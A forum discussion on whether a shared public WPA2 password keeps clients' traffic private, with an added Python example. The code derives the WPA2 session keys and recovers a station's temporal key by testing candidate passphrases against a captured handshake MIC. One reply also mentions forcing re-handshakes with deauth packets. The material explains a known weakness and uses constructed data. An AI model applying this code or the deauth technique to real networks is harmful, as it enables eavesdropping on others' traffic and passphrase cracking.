It's not very relevant to the current discussion, but there is a security advantage to requiring a public password vs totally open. For instance, a store could post a sign reading "Welcome to N Guy's Burgers; our WiFi password is 'N'".
You see, if the WiFi network is truly open, then client-to-access point traffic is open and can be sniffed by other clients on the network. But if the network is secured, even trivially as above, then each client's connection to the access point is individually encrypted and cannot be sniffed.
That means, if you needed any password to join the network, you needn't fear the questionable critter with the MBP in the corner (unless he's hacked the store's ISP or upstream from there).
Not true, unfortunately. The session key can be obtained as long as the attacker can capture the initial handshake (and they can send deauth packets to force the client and AP to handshake again). Wireshark does this decryption out of the box, just insert the Wifi password: https://wiki.wireshark.org/HowToDecrypt802.11
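What the reply above describes, worked through in code as an added example (not from any commenter or from Wireshark): the WPA2-PSK per-client key is a pure function of the passphrase, the SSID, the two MAC addresses and the two nonces, all of which a passive listener obtains from the 4-way handshake once it knows the shared passphrase. The key derivations (PBKDF2 PMK, PRF-512 PTK, HMAC-SHA1 EAPOL MIC) are the standard 802.11i ones; the MAC addresses, nonces and the EAPOL-Key frame contents are constructed here, not taken from a real capture.

```python
"""
WPA2-PSK: a client that knows the passphrase and captures the 4-way handshake
derives the same Temporal Key (TK) as the legitimate station, so "individually
encrypted" does not mean "private from other clients". Added example; the
station/AP MACs, nonces and EAPOL frame below are constructed test data.
"""
import hashlib
import hmac

MIC_OFFSET = 81          # EAPOL hdr(4)+desc(1)+info(2)+len(2)+replay(8)+nonce(32)+iv(16)+rsc(8)+id(8)
NONCE_OFFSET = 17        # EAPOL hdr(4)+desc(1)+info(2)+len(2)+replay(8)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # PSK -> PMK: PBKDF2-HMAC-SHA1, salt = SSID, 4096 iterations, 256 bits (802.11i)
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    # 802.11 PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ... then truncate
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> dict:
    # PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(N)||max(N))
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf(pmk, b"Pairwise key expansion", data, 64)
    return {"kck": ptk[:16], "kek": ptk[16:32], "tk": ptk[32:48]}


def eapol_mic(kck: bytes, frame_with_zero_mic: bytes) -> bytes:
    # Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1 over the EAPOL frame, truncated to 16 bytes
    return hmac.new(kck, frame_with_zero_mic, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    # Minimal EAPOL-Key message 2 of 4 (constructed; key info 0x010a = version 2, pairwise, MIC set)
    body = (bytes([2]) + (0x010A).to_bytes(2, "big") + (16).to_bytes(2, "big")
            + (1).to_bytes(8, "big") + snonce + bytes(16) + bytes(8) + bytes(8)
            + mic + (0).to_bytes(2, "big"))
    return bytes([2, 3]) + len(body).to_bytes(2, "big") + body   # EAPOL v2, type 3 = Key


def client_send_msg2(passphrase, ssid, ap_mac, sta_mac, anonce, snonce):
    """Legitimate station: derive PTK, emit message 2 with a valid MIC, keep TK for data frames."""
    ptk = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    frame = build_msg2(snonce)
    mic = eapol_mic(ptk["kck"], frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:], ptk["tk"]


def recover_tk(captured_msg2, ssid, ap_mac, sta_mac, anonce, candidates):
    """Sniffer: everything but the passphrase comes from the air. Returns (passphrase, TK) or None."""
    snonce = captured_msg2[NONCE_OFFSET:NONCE_OFFSET + 32]
    captured_mic = captured_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = captured_msg2[:MIC_OFFSET] + bytes(16) + captured_msg2[MIC_OFFSET + 16:]
    for pw in candidates:
        ptk = derive_ptk(pmk_from_passphrase(pw, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk["kck"], zeroed), captured_mic):
            return pw, ptk["tk"]           # MIC matches: this TK decrypts the station's traffic
    return None


# Constructed handshake parameters (not a real capture)
SSID, PASSPHRASE = "N Guy's Burgers", "N"
AP_MAC, STA_MAC = bytes.fromhex("020000000001"), bytes.fromhex("020000000002")
ANONCE, SNONCE = bytes(range(32)), bytes(range(100, 132))

if __name__ == "__main__":
    frame, real_tk = client_send_msg2(PASSPHRASE, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE)
    print(recover_tk(frame, SSID, AP_MAC, STA_MAC, ANONCE, ["wrong", PASSPHRASE]))
```

The sniffer side never talks to the AP: it needs the ANonce from message 1, the SNonce and MIC from message 2, and the two MAC addresses, which is exactly what the deauth-and-recapture trick guarantees it will see. Checking the candidate passphrase against the captured MIC is the same test Wireshark and aircrack-style tools perform before decrypting. In a real capture the EAPOL-Key frame is carried inside an 802.11 data frame with LLC/SNAP headers, so the offsets above apply to the EAPOL payload, not the whole frame.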
I don't see how this is possible. With a shared secret, there's no way to authenticate the AP. No auth means no defence against MITM. What am I missing? It might be harder to sniff but it's just a tool away, right?